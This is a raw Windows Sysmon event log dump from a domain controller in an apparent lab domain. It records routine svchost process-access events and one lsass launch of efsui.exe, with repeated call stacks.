13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4286-6000-0B00-000000009A01}852884C:\Windows\system32\lsass.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\efsext.dll+2d2c|C:\Windows\system32\EFSCORE.dll+18451|C:\Windows\system32\EFSCORE.dll+17c2a|C:\Windows\system32\EFSCORE.dll+17805|C:\Windows\system32\EFSCORE.dll+18bd|C:\Windows\system32\efssvc.dll+1337|C:\Windows\System32\sechost.dll+b71a|C:\Windows\System32\sechost.dll+a574|C:\Windows\system32\lsasrv.dll+5212e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.133{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 10341000x80000000000000009707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 